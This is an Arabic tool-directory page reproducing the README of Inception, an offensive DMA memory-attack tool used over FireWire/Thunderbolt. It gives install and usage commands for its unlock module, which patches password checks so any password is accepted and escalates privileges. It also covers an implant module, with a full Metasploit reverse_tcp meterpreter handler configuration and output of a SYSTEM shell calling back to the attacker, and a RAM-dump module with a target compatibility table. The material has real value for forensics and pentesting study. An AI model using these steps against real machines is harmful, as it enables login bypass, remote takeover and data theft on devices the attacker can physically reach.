Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
inception — Inception هي أداة للتلاعب بالذاكرة الفيزيائية والاختراق تستغل تقنية DMA القائمة على PCI. يمكن للأداة الهجوم عبر واجهات FireWire وThunderbolt وExpressCard وPC Card وأي واجهات PCI/PCIe أخرى. | Kitploit
أدوات/GitHubGitHub/carmaa/inception
تصعيد الامتيازاتتحليل الذاكرة الجنائيالاستغلالما بعد الاستغلالالتحاليل الرقمية الجنائيةاختبار الاختراقأمن الأجهزةالفريق الأحمرتطوير الحمولات
GitHubcarmaa/inception

inception

Inception هي أداة للتلاعب بالذاكرة الفيزيائية والاختراق تستغل تقنية DMA القائمة على PCI. يمكن للأداة الهجوم عبر واجهات FireWire وThunderbolt وExpressCard وPC Card وأي واجهات PCI/PCIe أخرى.

1.6k1985منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

ملاحظة: لم تعد هذه الأداة قيد التطوير النشط، يرجى الاطلاع على PCILeech بدلاً من ذلك.

INCEPTION

Inception هي أداة للتلاعب بالذاكرة الفعلية والقرصنة تستغل تقنية DMA القائمة على PCI. يمكن للأداة الهجوم عبر واجهات FireWire وThunderbolt وExpressCard وPC Card وأي واجهات أجهزة (HW) أخرى من نوع PCI/PCIe.

تهدف Inception إلى توفير طريقة سريعة نسبياً ومستقرة وسهلة وقابلة للتوسعة لتنفيذ اختراقات ذاكرة تطفلية وغير تطفلية ضد أجهزة كمبيوتر قيد التشغيل باستخدام DMA.

كيف تعمل

تعمل وحدات Inception على النحو التالي: من خلال تقديم دليل وحدة Serial Bus Protocol 2 (SBP-2) إلى الجهاز الضحية عبر واجهة IEEE1394 FireWire، يعتقد نظام تشغيل الضحية أن جهاز SBP-2 قد اتصل بمنفذ FireWire. وبما أن أجهزة SBP-2 تستخدم الوصول المباشر للذاكرة (DMA) لإجراء عمليات نقل بيانات سريعة وضخمة (مثل محركات الأقراص الصلبة من نوع FireWire وكاميرات الفيديو الرقمية)، تخفض الضحية دروعها وتمكّن DMA للجهاز. تمتلك الأداة الآن وصولاً كاملاً للقراءة/الكتابة إلى أول 4GB من ذاكرة الوصول العشوائي (RAM) على الجهاز الضحية.

بمجرد منح DMA، تواصل الأداة البحث في صفحات الذاكرة المتاحة عن تواقيع عند إزاحات معينة في كود نظام التشغيل. وبمجرد العثور عليها، تقوم الأداة بالتلاعب بهذا الكود. على سبيل المثال، في وحدة unlock، تقوم الأداة بقصر دائرة وحدة مصادقة كلمة المرور في نظام التشغيل التي يتم تشغيلها عند إدخال كلمة مرور غير صحيحة.

بعد تشغيل تلك الوحدة، يجب أن تكون قادراً على تسجيل الدخول إلى الجهاز الضحية باستخدام أي كلمة مرور.

التشبيه المناسب لهذه العملية هو زرع فكرة في ذاكرة الجهاز؛ فكرة أن كل كلمة مرور صحيحة. بمعنى آخر، ما يعادل [غرس فكرة في الذاكرة] 1.

Inception مجانية (free as in beer) وهي مشروع جانبي خاص بي.

رائع! ولكن لماذا؟

يستخدم خبراء الطب الشرعي الرقمي والحكومات والوكالات ذات الاختصارات ثلاثية الأحرف في العالم [أدوات مشابهة] 2 بالفعل. لذا إذا كنت معارضاً أو تواجه نظاماً قمعياً، توضح هذه الأداة سبب أهمية OPSEC. لا تترك حاسوبك المحمول بعيداً عن ناظريك أبداً.

تحفظات

يعطّل كل من [OS X > 10.7.2] 6 و[Windows > 8.1] 7 خاصية FireWire DMA عندما يقوم المستخدم بقفل نظام التشغيل، وبالتالي يمنعان عمل Inception. ستظل الأداة تعمل بينما يكون المستخدم مسجلاً الدخول. ومع ذلك، فإن سيناريو الهجوم هذا أقل احتمالاً في الحياة الواقعية (IRL).

بالإضافة إلى ذلك، فعّلت [OS X Mavericks > 10.8.2 على Ivy Bridge (أجهزة Mac >= 2012)] 8 تقنية VT-D، مما يحجب طلبات DMA بشكل فعال ويُحبط جميع وحدات Inception حتى عندما يكون المستخدم مسجلاً الدخول. ابحث عن إدخالات vtd[0] fault في السجل/وحدة التحكم الخاصة بك.

على الرغم من أن هذين التحفظين سيقللان تدريجياً من عدد السيناريوهات التي تكون فيها هذه الأداة مفيدة، إلا أنه اعتباراً من مارس 2015 [لا تزال 70 % من الأجهزة الموجودة معرضة للخطر] 9.

بيانات أساسية

  • الإصدار: 0.4.2
  • الترخيص: GPL
  • المؤلف: Carsten Maartmann-Moe ([email protected])
  • تويتر: @MaartmannMoe
  • المصدر: https://github.com/carmaa/inception

تستخدم الأداة مكتبة libforensic1394 بفضل Freddie Witherden بموجب ترخيص LGPL.

المتطلبات

تتطلب Inception:

  • الأجهزة (Hardware):
    • جهاز المهاجم: Linux أو Mac OS X (المضيف / جهاز المهاجم) مزود بواجهة FireWire، إما عبر منفذ FireWire أصلي أو منفذ توسعة ExpressCard/PCMCIA أو محول Thunderbolt إلى FireWire.
    • الجهاز الضحية: واجهة FireWire أو Thunderbolt، أو منفذ توسعة ExpressCard/PCMCIA

يُنصح حالياً باستخدام Linux على جانب المهاجم بسبب واجهات firewire المعطوبة على OS X. لاحظ أن الاتصال المباشر ThunderBolt إلى ThunderBolt لا يعمل، فأنت بحاجة إلى محول FireWire. قد تختلف النتائج عند محاولة استخدام Thunderbolt على Linux.

  • البرمجيات (Software):
    • Python 3
    • git
    • gcc (بما في ذلك g++)
    • cmake
    • pip (لحل التبعيات تلقائياً)
    • [libforensic1394] 3
    • msgpack

التثبيت

في التوزيعات المبنية على Debian، يمكن تلخيص أوامر التثبيت على النحو التالي (طبّق sudo عند الحاجة إذا لم تكن مستخدماً جذرياً (root)):

root@kitploit:~
apt-get install git cmake g++ python3 python3-pip

على OS X، يمكنك تثبيت متطلبات الأداة باستخدام [homebrew] 4:

root@kitploit:~
brew install git cmake python3

بعد تثبيت المتطلبات، قم بتنزيل وتثبيت libforensic1394:

root@kitploit:~
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install

تنزيل وتثبيت Inception

root@kitploit:~
git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

يجب أن يكون نص الإعداد قادراً على تثبيت التبعيات إذا كان لديك pip مثبتاً.

الاستخدام العام

  1. قم بتوصيل جهاز المهاجم (المضيف) والجهاز الضحية (الهدف) بكابل FireWire
  2. قم بتشغيل Inception

ما عليك سوى كتابة:

root@kitploit:~
incept [module name]

للحصول على وصف أكثر اكتمالاً وتحديثاً، يرجى تشغيل:

root@kitploit:~
incept -h

أو راجع [الصفحة الرئيسية للأداة] 5.

الوحدات

اعتباراً من الإصدار 0.4.0، تم تحويل Inception إلى وحدات. الوحدات الحالية ووظائفها موصوفة أدناه.

للحصول على خيارات مفصلة حول الاستخدام، قم بتشغيل:

root@kitploit:~
incept [module name] -h

Unlock

يمكن لوحدة unlock فتح القفل (قبول أي كلمة مرور) ورفع الامتيازات إلى Administrator/root على أي جهاز قيد التشغيل تقريباً* لديك وصول مادي إليه. صُممت الوحدة في المقام الأول لتفعل سحرها ضد أجهزة الكمبيوتر التي تستخدم تشفير القرص الكامل مثل BitLocker وFileVault وTrueCrypt أو Pointsec. هناك الكثير من الطرق الأخرى (والأفضل) لاختراق جهاز لا يحتوي على تشفير.

وحدة unlock مستقرة على الأجهزة التي تحتوي على 4 غيغابايت (GiB) من الذاكرة الرئيسية أو أقل. إذا كان هدفك يحتوي على أكثر من ذلك، فستحتاج إلى الحظ من أجل العثور على التواقيع المرتبطة بإطار صفحة ذاكرة فعلية يمكن للأداة الوصول إليه.

اعتباراً من هذا الإصدار، يمكنها فتح أنظمة التشغيل x86 وx64 التالية:

(1): انظر التحفظات أعلاه.

قد تعمل توزيعات Linux الأخرى التي تستخدم مصادقة قائمة على PAM أيضاً باستخدام تواقيع Ubuntu.

تعمل الوحدة أيضاً على تمكين رفع الامتيازات بفعالية، على سبيل المثال عبر الأمرين runas أو sudo -s، على التوالي.

التنفيذ

لفتح القفل، ما عليك سوى كتابة:

root@kitploit:~
incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Implant

تزرع وحدة implant حمولة Metasploit (مقتصرة على الذاكرة) مباشرة في الذاكرة المتطايرة للجهاز الهدف. وتتكامل مع MSF عبر البرنامج الخفي msfrpcd المضمّن في جميع إصدارات Metasploit.

يعمل الإصدار الحالي فقط كإثبات للمفهوم (proof-of-concept) ضد Windows 7 SP1 x86. لا يتم دعم أي أنظمة تشغيل أو إصدارات أو بنى أخرى، ولا يوجد أي ضمان بأنها ستدعم في المستقبل.

التنفيذ

لاستخدامها، ابدأ msfrpcd:

root@kitploit:~
msfrpcd -P [password]

ثم شغّل Inception في طرفية أخرى:

root@kitploit:~
incept implant --msfpw [password] --msfopts [options]

كمثال، لإنشاء قشرة meterpreter TCP عكسية من الجهاز الهدف إلى مضيفك المهاجم، ابدأ أولاً البرنامج الخفي msfrpcd، ثم شغّل وحدة تحكم تستمع لعمليات الاستدعاء (callbacks).

root@kitploit:~
msfrpcd -P password
msfconsole

في وحدة التحكم، نقوم بتكوين الطرف المستقبِل للحمولة. نقوم بتعيين خيار EXITFUNC إلى thread لضمان بقاء العملية الهدف حية إذا حدث خطأ ما:

root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j

ثم، في طرفية أخرى، نقوم بتشغيل Inception:

root@kitploit:~
incept implant --msfpw password --msfopts LHOST=172.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

في وحدة تحكم MSF الخاصة بك، يجب أن ترى شيئاً مشابهاً لما يلي:

root@kitploit:~
msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump

تسهّل وحدة dump تفريغ الذاكرة من الهدف إلى المضيف المهاجم.

التنفيذ

root@kitploit:~
incept dump

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[*] Dumping from 0x0 to 0x40000000, a total of 1 GiB:
[==============================================================] 1024 MiB (100%)
[*] Dumped memory to file memdump_0x0-0x40000000_20140830-174305.bin
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

أخطاء / تحفظات معروفة

يرجى الاطلاع على التعليقات في الأعلى وعلى [الصفحة الرئيسية للأداة] 5.

استكشاف الأخطاء وإصلاحها

يرجى الاطلاع على [الصفحة الرئيسية للأداة] 5.

الميزات المخطط لها

  • زرع موثوق على x64
  • تجاوز VT-D
  • زرع على مستوى النواة (ring 0)
  • المزيد من التواقيع

سجل التطوير

  • 0.0.1 - الإصدار الأول، يدعم الفتح الأساسي لنظامي Windows XP SP3 وVista و7 وMac OS X وUbuntu Gnome
  • 0.0.2 - إضافة تواقيع للإصدارات المبكرة من XP SP3 وWindows 7 x86 وx64 SP1
  • 0.0.3 - إضافة بعض التواقيع (شكراً Tekkenhead) ومعالجة الأخطاء
  • 0.0.4 - إضافة businfo لعرض أجهزة FireWire المتصلة بالإضافة إلى قدرات تفريغ الذاكرة
  • 0.0.5 - تحسين قدرات تفريغ الذاكرة وإضافة كتالوج عينات
  • 0.0.6 - إضافة اختبارات الوحدة (unit testing)
  • 0.0.7 - تحديث تواقيع Ubuntu ورفع الامتيازات - شكراً Adel Khaldi من الجزائر
  • 0.0.8 - إصلاح تصحيحات فتح القفل ورفع الامتيازات في Ubuntu - تصحيح واحد لمضاعفة الأثر
  • 0.1.0 - أول إصدار فرعي! إضافة تواقيع لـ OS X وVista، بالإضافة إلى عدد غير قليل من إصلاحات الأخطاء
  • 0.1.1 - إضافة تواقيع لـ Ubuntu 12.04 LTS
  • 0.1.2 - إصلاح العديد من الأخطاء
  • 0.1.3 - إصلاح خطأ تواقيع OS X 10.6.8 x64
  • 0.1.4 - إضافة الوضع اليدوي لتسهيل اختبار التواقيع الجديدة
  • 0.2.0 - إضافة تواقيع لـ OS X Mountain Lion (10.8) وWindows 8
  • 0.2.1 - إضافة تواقيع لـ Ubuntu 12.10
  • 0.2.2 - إضافة تواقيع لـ Linux Mint
  • 0.2.3 - تنظيف عام للكود، ومخرجات أجمل وأكثر اتساقاً
  • 0.2.4 - إضافة شريط تقدم
  • 0.2.5 - لم يعد من الضروري أن تكون مستخدماً جذرياً (root) لتشغيل الأداة
  • 0.2.6 - إصلاحات أخطاء
  • 0.3.0 - إضافة دعم لأهداف Ubuntu 13.04
  • 0.3.1 - إضافة دعم لـ OS X Mavericks وWindows 8.1
  • 0.3.2 - إصلاحات أخطاء ودعم لـ Ubuntu 13.10
  • 0.3.3 - إصلاحات أخطاء تتعلق بالمخرجات ومعالجة الأخطاء
  • 0.3.4 - Maestro!
  • 0.3.5 - إضافة تواقيع Ubuntu 10.10 و10.04 x86
  • 0.4.0 - إعادة هيكلة وإعادة كتابة كاملة. إضافة وحدة implant
  • 0.4.1 - دمج دعم واجهة SLOTSCREAMER
  • 0.4.2 - تواقيع جديدة

إخلاء مسؤولية

لا تفعل الشر بهذه الأداة. أيضاً، أنا مختبِر اختراق (pentester) وليس مطوراً. لذا إذا رأيت كوداً غريباً يزعج حاسة النقاء البايثونية لديك، أرسل لي ملاحظة حول كيفية تحسينه. أو حتى أفضل، انسخ (fork) الكود الخاص بي وعدّله وقدّم طلب سحب (pull request).

تنزيل الأداة
نظام التشغيلالإصدارفتح شاشة القفلرفع الامتيازات
Windows 88.1نعم (1)نعم (1)
Windows 88.0نعمنعم
Windows 7SP1نعمنعم
Windows 7SP0نعمنعم
Windows VistaSP2نعمنعم
Windows VistaSP1نعمنعم
Windows VistaSP0نعمنعم
Windows XPSP3نعمنعم
Windows XPSP2نعمنعم
Windows XPSP1
Windows XPSP0
Mac OS XMavericksنعم (1)نعم (1)
Mac OS XMountain Lionنعم (1)نعم (1)
Mac OS XLionنعم (1)نعم (1)
Mac OS XSnow Leopardنعمنعم
Mac OS XLeopard
UbuntuSaucyنعمنعم
UbuntuRaringنعمنعم
UbuntuQuantalنعمنعم
UbuntuPreciseنعمنعم
UbuntuOneiricنعمنعم
UbuntuNattyنعمنعم
Linux Mint13نعمنعم
Linux Mint12نعمنعم
Linux Mint12نعمنعم